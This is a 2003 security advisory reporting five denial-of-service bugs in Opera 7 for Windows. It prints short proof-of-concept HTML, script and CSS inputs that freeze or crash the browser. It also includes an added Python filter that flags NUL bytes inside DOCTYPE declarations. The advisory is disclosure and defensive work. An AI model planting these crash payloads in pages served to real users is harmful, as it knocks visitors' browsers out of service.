Reported June 30, 2003, by ::Operash::.
VERSIONS AFFECTED
Opera for Windows, versions 7.11b (build 2887), 7.11 (build 2880), 7.10 (build 2840), and 7.03 (build 2670)
DESCRIPTION
Five new, unfixed bugs in the Opera 7 Web browser for Windows can result in a denial-of-service (DoS) condition.
DEMONSTRATION
The discoverer posted the following demonstrations as proof of concept:
2. SAMPLE CODE & IMPACT
=========================
[ CODE 1 ]
Just 12 bytes of data, "<!DOCTYPE" + NULL(\x00) + 1 byte + ">", make
CPU usage go up to 100% (depending on comp specs) and the computer
freezes.
-----------------------------------------------------------------
<!DOCTYPE[\x00]A>
-----------------------------------------------------------------
[ CODE 2 ]
Abnormal termination is caused.
-----------------------------------------------------------------
<form></form><script>document.forms[0].submit()</script>
-----------------------------------------------------------------
[ CODE 3 ]
Abnormal termination is caused.
-----------------------------------------------------------------
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
-----------------------------------------------------------------
[ CODE 4 ]
Abnormal termination is caused.
-----------------------------------------------------------------
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>
-----------------------------------------------------------------
[ CODE 5 ]
CPU usage goes up to 100% (depending on its specs) and the computer
freezes.
-----------------------------------------------------------------
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
-----------------------------------------------------------------
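A defensive check for the CODE 1 input, as an added example that is not part of the original advisory: a content filter (for instance in a proxy or mail gateway) can flag any DOCTYPE declaration that contains a NUL byte. It generalizes beyond the 12-byte sample to any letter case, any NUL position and unterminated declarations, which the advisory does not test; the function name, the length bound and every sample except the first are assumptions made for illustration.

```python
import re

# Matches the start of a DOCTYPE declaration, case-insensitively, in raw bytes.
DOCTYPE_START = re.compile(rb"<!doctype", re.IGNORECASE)

# Assumption: no legitimate declaration runs longer than this; bounds the scan.
MAX_DECL_LEN = 1024


def find_nul_in_doctype(body: bytes) -> list[int]:
    """Return the offsets of NUL bytes that fall inside a DOCTYPE declaration.

    A declaration is taken to run from "<!DOCTYPE" to the next ">" byte, or to
    MAX_DECL_LEN bytes when no ">" follows (an unterminated declaration is
    still inspected rather than skipped).
    """
    hits = []
    for m in DOCTYPE_START.finditer(body):
        start = m.end()
        end = body.find(b">", start, start + MAX_DECL_LEN)
        if end == -1:
            end = min(len(body), start + MAX_DECL_LEN)
        hits.extend(i for i in range(start, end) if body[i] == 0)
    return hits


# Constructed samples. The first is the 12-byte input from CODE 1.
SAMPLES = {
    "code1": b"<!DOCTYPE\x00A>",
    "lowercase": b"<html><!doctype html\x00>",
    "unterminated": b"<!DOCTYPE html \x00",
    "clean": b"<!DOCTYPE html><p>\x00</p>",  # NUL outside the declaration
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        offsets = find_nul_in_doctype(data)
        verdict = "BLOCK" if offsets else "pass"
        print(f"{name:13} {verdict:5} NUL offsets: {offsets}")
```
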
VENDOR RESPONSE
Opera was notified on June 24, 2003, but hasn't yet responded to these problems.
CREDIT
Discovered by :: Operash ::.